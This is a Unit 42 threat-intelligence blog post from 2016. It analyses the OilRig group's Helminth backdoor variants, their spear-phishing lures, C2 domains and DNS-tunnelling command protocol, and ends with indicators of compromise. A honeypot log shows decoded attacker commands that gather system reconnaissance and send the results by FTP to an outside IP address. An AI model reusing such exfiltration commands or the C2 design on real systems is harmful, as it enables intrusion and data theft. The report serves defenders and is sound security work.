[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  English
* [English](https://unit42.paloaltonetworks.com/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# OilRig Malware Campaign Updates Toolset and Expands Targets

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 7 min read

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:October 4, 2016

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [Clayside](https://unit42.paloaltonetworks.com/tag/clayside/)
  * [Helminth](https://unit42.paloaltonetworks.com/tag/helminth/)
  * [OilRig](https://unit42.paloaltonetworks.com/tag/oilrig/)
  * [OilRig attacks](https://unit42.paloaltonetworks.com/tag/oilrig-attacks/)
  * [Spear Phishing](https://unit42.paloaltonetworks.com/tag/spear-phishing/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/?pdf=download&lg=en&_wpnonce=1628116e08 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/?pdf=print&lg=en&_wpnonce=1628116e08 "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=OilRig%20Malware%20Campaign%20Updates%20Toolset%20and%20Expands%20Targets&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F&title=OilRig%20Malware%20Campaign%20Updates%20Toolset%20and%20Expands%20Targets "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F&text=OilRig%20Malware%20Campaign%20Updates%20Toolset%20and%20Expands%20Targets "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=OilRig%20Malware%20Campaign%20Updates%20Toolset%20and%20Expands%20Targets%20https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-oilrig-malware-campaign-updates-toolset-and-expands-targets%2F "Share in Mastodon")
  Since our first published analysis of the [OilRig campaign in May 2016](https://blog.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/), we have continued to monitor this group for new activity. In recent weeks we've discovered that the group have been actively updating their Clayslide delivery documents, as well as the Helminth backdoor used against victims. Additionally, the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia, but also a company in Qatar and government organizations in Turkey, Israel and the United States.

## Expanded Targeting

The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims. As an example, the following email was sent to a Turkish government organization using a lure of purported new portal logins for an airline's website. (Please note that the sender email used in the figure below may have been spoofed.)

[![](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/Picture1.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/Picture1.png)

*Figure 1 Phishing email sent to Turkish government organization*

When the users.xls file is executed and macros are enabled, the victim is presented with the following decoy document.

[![oilrig\_2](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_2.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_2.png)

*Figure 2 Content contained in malicious Helminth XLS file*

This same document content was used with Helminth samples targeting government organizations in multiple nations. For those particular attacks, the following filenames were witnessed:

* Help-Yemen.xls
* users.xls

In addition to these instances, multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth samples earlier this year. In those cases, the documents used to carry the malicious macro code were very specific to the organization receiving them and in some cases were sent from partner organizations that already had a relationship with the recipient.

## Updates to Toolset

In recent months, we've tracked a number of changes to the malware used by the actors responsible for OilRig. In the past five months, we've identified four distinct variants, each of which drops different filenames upon execution. These variants use the following filenames when dropped. (Please note that FireEye was notified about the use of their company name in the malware upon discovery.)

* update.vbs / dns.ps1
* fireeye.vbs / fireeye.ps1
* upd.vbs / dn.ps1
* komisova.vbs / komisova.ps1

The following timeline shows the prevalence of each variant.

[![oilrig\_3](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_3.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_3.png)

*Figure 6 Helminth variants over time*

As we can see in the above timeline, the attackers shifted from the update.vbs variant of their malware in late May 2016 to use the fireeye.vbs variant. More recently, the upd.vbs variant was discovered, which appears to be an actively developed copy. Comments and other artifacts were discovered in this variant, which will be discussed further later in this post. More recently, the komisova.vbs variant was discovered to be used.

### Changes in VBScripts Between Variants

Overall, there are minimal changes in the dropped VBS files between variants. As a reminder, the VBS script is responsible for communicating with a remote server via HTTP. The script repeatedly attempts to download a file from the remote server, and proceeds to execute it when available. The output of this file is then uploaded via another HTTP request. It will also execute the PowerShell script that is dropped by the Clayslide Excel documents.

Overall, there are minor differences between the variants observed. The main differences appear to be in the domains and IP addresses used. The following URLs are used by each:

**update.vbs**

* hxxp://winodwsupdates\[.\]me/counter.aspx?req=
* hxxp://go0gIe\[.\]com/sysupdate.aspx?req=

**fireeye.vbs**

* hxxp://update-kernal\[.\]net/update-index.aspx?req=
* hxxp://upgradesystems\[.\]info/upgrade-index.aspx?req=
* hxxp://yahoooooomail\[.\]com/update-index.aspx?req=
* hxxp://googleupdate\[.\]download/update-index.aspx?req=

**upd.vbs**

* hxxp://83.142.230\[.\]138:7020/update.php?req=

**komisova.vbs**

* hxxp://googleupdate\[.\]download/update-index.aspx?req=

A few things to note include the fact that the komisova.vbs variant uses the same URL witnessed in the fireeye.vbs variant. It's worth pointing out that this domain was only seen in the most recent fireeye.vbs variants, so it's very possible that it was used in a transition phase when the attackers were switching over to komisova.

We previously mentioned that the Excel file dropping upd.vbs was likely a development version. Evidence supporting this claim includes the fact that an IP address connection using a non-standard port was used for this file. One particularly interesting feature of this IP address is that it has ties to the Remexi report [issued by Symantec in late 2015](https://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf). This is in-line with previous evidence suggesting an Iranian-based actor behind these attacks.

[![oilrig\_4](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_4.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_4.png)

*Figure 7 Ties between IP address and Remexi (Shown in PassiveTotal)*

The underlying code of upd.vbs is much cleaner when comparing it against the other variants. This can be seen below. This provides additional evidence that it is being actively developed.

[![oilrig\_5](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_5.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_5.png)

*Figure 8 Differences between upd.vbs and komisova.vbs*

Another minor difference observed in the upd.vbs variant is the location of files that are downloaded. The three other variants all place downloaded file within a subfolder that resides in %PUBLIC%/Libraries. However, this particular one-off places its files within subfolders that reside in %USERPROFILE%/AppData/Local/Microsoft/Media/.

### Changes in PS1 Between Variants

Similar to the VBS file, the PS1 file will also communicate with a remote server. Unlike the VBS file, the PS1 file uses DNS instead of HTTP. Commands and file locations are received by the remote server, executed, and the output of these commands is in turn uploaded via additional DNS requests. For an in-depth analysis on how this occurs, please refer to our previous [OilRig blog post](https://blog.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/). Overall, there are very minor differences between the dns, fireeye, and komisova PS1 variants. However, the dn.ps1 variant looks to have been updated considerably. In addition to these updates, the file is also heavily commented, providing further evidence that this particular file is being actively developed.

[![oilrig\_6](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_6.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/10/OilRig_6.png)

*Figure 9 Beginning of dn.ps1 variant*

The dn.ps1 variant will perform DNS queries with the following characteristics:

rne\_\[victim\_id\]_\[random\].hostname rd_\[victim\_id\]_\[filename\]_\[file\_size\]_\[random\].hostname bne_\[victim\_id\]_random\].hostname bd_\[victim\_id\]_\[filename\]_\[file\_size\]_\[random\].hostname u_\[victim\_id\]_\[filename\]_\[byte\_position\]\_\[random\].hostname

|-----------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 | rne\_\[victim\_id\]_\[random\].hostname rd_\[victim\_id\]_\[filename\]_\[file\_size\]_\[random\].hostname bne_\[victim\_id\]_random\].hostname bd_\[victim\_id\]_\[filename\]_\[file\_size\]_\[random\].hostname u_\[victim\_id\]_\[filename\]_\[byte\_position\]\_\[random\].hostname |

In the above queries, the 'rne' command will ask the remote server if a normal file is available for download. If it is, the server will respond with a response of 'OK', followed by the filename. In such a situation, the malware will perform the 'rd' command, which will actually download the file in question.

Similarly, the same execution flow is seen for the 'bne' and 'bd' commands respectively, only this particular operation is looking for a batch file. In the event the malware is downloading files, it will look for a string of 'EOFEOF' to signal the end of the data stream.

The 'u' command is used to upload data that is generated from any provided files or scripts. Data is uploaded in chunks, with the 'byte\_position' variable holding the current byte position of the uploaded file.

We ran this particular variant for a number of days, and were able to solicit the attackers to interact with our honeypot. A Python script was used to parse the collected PCAP, with the following results (truncated for brevity):

\[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1988996938.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1404872126.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK1.txt \[\*\] Filename: 1.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1\_-_txt\_0\_840824109.shalaghlagh.tk | Type: TXT \[+\] Response TXT: aG9zdG5hbWU= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1_-_txt\_8\_1643283204.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: hostname \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1534172028.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK2.txt \[\*\] Filename: 2.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_2_-_txt\_0\_579093369.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3lzdGVtaW5mbw== \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_2_-_txt\_10\_1446367320.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: systeminfo \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1130109782.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1735654322.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK3.txt \[\*\] Filename: 3.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_3_-_txt\_0\_122829473.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3RhcnQgZnRwIC1BIDg3LjExNy4yMDQuMTQz \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_3_-_txt\_27\_1524268269.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: start ftp -A 87.117.204.143 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_117849324.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_926300114.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK5.txt \[\*\] Filename: 5.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_0\_1307455992.shalaghlagh.tk | Type: TXT \[+\] Response TXT: d2hvYW1pPmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0KaXBjb25maWc\_PmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0Kc3 lzdGVtaW5mbz4\_Yzpcd2luZG93c1x0ZW1wXHQudHh0DQplY2hvIFBVVCBjOlx3aW5kb3dzXHRlbXBcdC50eHQg fCBmdHAgLUEgODcuMTE3LjIwNC4x \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_150\_2072649310.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NDM= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_152\_1977692291.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: whoami\>c:\\windows\\temp\\t.txt ipconfig\>\>c:\\windows\\temp\\t.txt systeminfo\>\>c:\\windows\\temp\\t.txt echo PUT c:\\windows\\temp\\t.txt | ftp -A 87.117.204.143 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_155964816.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1003791024.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK7.txt \[\*\] Filename: 7.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_0\_1649905845.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3RhcnQgZnRwIC1BIDgzLjE0Mi4yMzAuMTM4 \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_27\_65323037.shalaghlagh.tk | Type: TXT \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_27\_65323037.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: start ftp -A 83.142.230.138 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1205170103.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_779542217.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK11.txt \[\*\] Filename: 11.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_11_-_txt\_0\_1213525986.shalaghlagh.tk | Type: TXT \[+\] Response TXT: QGVjaG8gb2ZmDQplY2hvIDE= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_11_-\_txt\_17\_651256114.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: @echo off echo 1 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_816831185.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO

|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 | \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1988996938.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1404872126.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK1.txt \[\*\] Filename: 1.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1\_-_txt\_0\_840824109.shalaghlagh.tk | Type: TXT \[+\] Response TXT: aG9zdG5hbWU= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1_-_txt\_8\_1643283204.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: hostname \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1534172028.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK2.txt \[\*\] Filename: 2.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_2_-_txt\_0\_579093369.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3lzdGVtaW5mbw== \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_2_-_txt\_10\_1446367320.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: systeminfo \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1130109782.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1735654322.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK3.txt \[\*\] Filename: 3.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_3_-_txt\_0\_122829473.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3RhcnQgZnRwIC1BIDg3LjExNy4yMDQuMTQz \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_3_-_txt\_27\_1524268269.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: start ftp -A 87.117.204.143 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_117849324.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_926300114.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK5.txt \[\*\] Filename: 5.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_0\_1307455992.shalaghlagh.tk | Type: TXT \[+\] Response TXT: d2hvYW1pPmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0KaXBjb25maWc\_PmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0Kc3 lzdGVtaW5mbz4\_Yzpcd2luZG93c1x0ZW1wXHQudHh0DQplY2hvIFBVVCBjOlx3aW5kb3dzXHRlbXBcdC50eHQg fCBmdHAgLUEgODcuMTE3LjIwNC4x \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_150\_2072649310.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NDM= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_5_-_txt\_152\_1977692291.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: whoami\>c:\\windows\\temp\\t.txt ipconfig\>\>c:\\windows\\temp\\t.txt systeminfo\>\>c:\\windows\\temp\\t.txt echo PUT c:\\windows\\temp\\t.txt | ftp -A 87.117.204.143 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_155964816.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1003791024.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK7.txt \[\*\] Filename: 7.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_0\_1649905845.shalaghlagh.tk | Type: TXT \[+\] Response TXT: c3RhcnQgZnRwIC1BIDgzLjE0Mi4yMzAuMTM4 \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_27\_65323037.shalaghlagh.tk | Type: TXT \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_7_-_txt\_27\_65323037.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: start ftp -A 83.142.230.138 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_1205170103.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO \[+\] Query: bne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_779542217.shalaghlagh.tk | Type: TXT \[+\] Response TXT: OK11.txt \[\*\] Filename: 11.txt \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_11_-_txt\_0\_1213525986.shalaghlagh.tk | Type: TXT \[+\] Response TXT: QGVjaG8gb2ZmDQplY2hvIDE= \[+\] Query: bd\_DNSTRWIN-LJLV2NKIOKPR1009969912\_11_-\_txt\_17\_651256114.shalaghlagh.tk | Type: TXT \[+\] Response TXT: EOFEOF \[\*\] Decoded Stream: @echo off echo 1 \[+\] Query: rne\_DNSTRWIN-LJLV2NKIOKPR1009969912\_816831185.shalaghlagh.tk | Type: TXT \[+\] Response TXT: NO |

As we can see, a number of interesting commands were received by the attackers, including attempts to communicate with remote FTP servers and various reconnaissance commands. These commands came at seemingly random intervals, indicating they likely resulted from an actual attacker issuing them, versus an automated system.

## Conclusion

The attackers using the Helminth and Clayslide malware families continue to target various high value companies and organizations across the globe using their customized malware. This malware is under active development and continues to be updated and improved upon, as witnessed in the files discussed in this blog post. While the malware deployed is not terribly sophisticated, it uses techniques such as DNS command and control (C2) that allows it to stay under the radar at many establishments.

Palo Alto Networks customers are protected against this threat in the following ways:

* WildFire identifies all Helminth and Clayslide samples as malicious
* Domains identified as command and control servers are flagged as malicious
* AutoFocus tags [Helminth](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Helminth) and [Clayslide](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Clayslide) may be used to track this group

## Indicators of Compromise

F04CF9361CF46BFF2F9D19617BBA577EA5F3AD20EA76E1F7E159701E446364FC  
E2EC7FA60E654F5861E09BBE59D14D0973BD5727B83A2A03F1CECF1466DD87AA  
31DB0841C3975BE5395F13C894B7E444D150CC701487B756FFF43CE78D98B1E6  
C3C17383F43184A29F49F166A92453A34BE18E51935DDBF09576A60441440E51  
C6437F57A8F290B5EC46B0933BFA8A328B0CB2C0C7FBEEA7F21B770CE0250D3D  
5A2C38BE89AC878D28080A7465C4A3F8708FB414B811511B9D5AE61A47593A69  
BD0920C8836541F58E0778B4B64527E5A5F2084405F73EE33110F7BC189DA7A9  
90639C7423A329E304087428A01662CC06E2E9153299E37B1B1C90F6D0A195ED  
528D432952EF879496542BC62A5A4B6EEE788F60F220426BD7F933FA2C58DC6B  
3772D473A2FE950959E1FD56C9A44EC48928F92522246F75F4B8CB134F4713FF  
F3856C7AF3C9F84101F41A82E36FC81DFC18A8E9B424A3658B6BA7E3C99F54F2  
0CD9857A3F626F8E0C07495A4799C59D502C4F3970642A76882E3ED68B790F8E  
80161DAD1603B9A7C4A92A07B5C8BCE214CF7A3DF897B561732F9DF7920ECB3E  
D874F513A032CCB6A5E4F0CD55862B024EA0BEE4DE94CCF950B3DD894066065D  
5E9DDB25BDE3719C392D08C13A295DB418D7ACCD25D82D020B425052E7BA6DC9  
299BC738D7B0292820D99028289280BA24D7FB985851D9C74060AF7950CECEF0  
2E226A0210A123AD828803EB871B74ECBDB702FC4BABD9FF786231C486FF65E0  
F1DE7B941817438DA2A4B7284BC56C291DB7312E3BA5E2397B3621811A816AA3  
65920EAEA00764A245ACB58A3565941477B78A7BCC9EFAEC5BF811573084B6CF  
742A52084162D3789E196FB5FF6F8E2983147CD914088BD5F9ED363D7A5B0DF0  
4E5B85EA68BF8F2306B6B931810AE38C8DFF3679D78DA1AF2C91032C36380353  
36D4B4B018EC78A79F3C06DC30EC77C250307628A7631F6B5B5995E797D0674F  
005DDE45A6F1D9B2A254E71F89F12AB0DFAAA48D081F5C0A434800BD5C327086  
2C4BCAB135BF1846684B598E66E3F51443F70F9E8D0544F3417774CBE907E8EF  
C4FBC723981FC94884F0F493CB8711FDC9DA698980081D9B7C139FCFFBE723DA  
CFFC694ACE3E1547007AE00437536F2A88BA60179C51F23228E696FB02AFDC86  
0B9437DD87A3C24ED7D200F9B870D69F9B7AD918C51325C11444DF8BC6FB97BA  
903B6D948C16DC92B69FE1DE76CF64AB8377893770BF47C29BF91F3FD987F996  
8BFBB637FE72DA5C9AEE9857CA81FA54A5ABE7F2D1B061BC2A376943C63727C7  
9C0A33A5DC62933F17506F20E0258F877947BDCD15B091A597EAC05D299B7471  
93940B5E764F2F4A2D893BEBEF4BF1F7D63C4DB856877020A5852A6647CB04A0  
0EC288AC8C4AA045A45526C2939DBD843391C9C75FA4A3BCC0A6D7DC692FDCD1  
089BF971E8839DB818AC462F53F82DAED523C413BFC2E01FB76DD70B37162AFE  
D808F3109822C185F1D8E1BF7EF7781C219DC56F5906478651748F0ACE489D34  
3986D54B00647B507B2AFD708B7A1CE4C37027FB77D67C6BC3C20C3AC1A88CA4  
1B2FEE00D28782076178A63E669D2306C37BA0C417708D4DC1F751765C3F94E1  
662C53E69B66D62A4822E666031FD441BBDFA741E20D4511C6741EC3CB02475F  
F5A64DE9087B138608CCF036B067D91A47302259269FB05B3349964CA4060E7E  
A787C0E42608F9A69F718F6DCA5556607BE45EC77D17B07EB9EA1E0F7BB2E064  
4B5112F0FB64825B879B01D686E8F4D43521252A3B4F4026C9D1D76D3F15B281  
3AF6DFA4CEBD82F48B6638A9757730810707D79D961DDE1B72D3768E972E6184

### C2 Servers

shalaghlagh\[.\]tk  
go0gIe\[.\]com  
winodwsupdates\[.\]me  
update-kernal\[.\]net  
googleupdate\[.\]download  
yahoooooomail\[.\]com  
upgradesystems\[.\]info

### File Paths

%PUBLIC%/Libraries/dn  
%PUBLIC%/Libraries/up  
%USERPROFILE%/AppData/Local/Microsoft/Media/up  
